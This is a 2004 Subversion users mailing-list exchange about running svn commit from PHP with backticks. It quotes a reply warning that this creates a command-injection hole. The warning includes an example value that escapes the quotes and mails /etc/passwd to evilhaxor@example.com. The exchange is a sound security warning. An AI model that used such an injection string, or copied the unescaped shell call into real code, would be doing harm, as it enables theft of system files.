But $message is created by the script, with no user
input. It comes
from portal variables such as the current user and
location in the
portal. Also, the apache2 server is running as the
svn user who can
only access things in ~/ and
/usr/local/apache2/htdocs.
Regards,
Bryan Simmons
-----Original Message-----
From: Brian W. Fitzpatrick [mailto:fitz@red-bean.com]
Sent: Wednesday, February 11, 2004 4:56 PM
To: Simmons, Bryan
Cc: users@subversion.tigris.org
Subject: Re: PHP hack under way
On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I
could: svn client
> commands in php. The kinks have not all been worked
out for my php
> portal but I did find a way to successfully
> push revisions to subversion through php.
>
> I use the backtick operator. Yep, it's that simple.
>
> $response = `svn commit -m \"$message\"`;
>
> I have found that the $response is dead-on accurate
in this case
> despite warnings that the command line response may
be garbled into
> binary.
>
> Here's a question: will svn add && svn commit work?
I don't know offhand, but I suspect that you may be
opening up a
security hole the size of Texas by doing this. What
if message is
actually equal to
"foo\" ; mail evilhaxor@example.com < /etc/passwd"
or something worse.
Just a little something to think about.
-Fitz
__________________________________
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Wed Feb 11 23:01:42 2004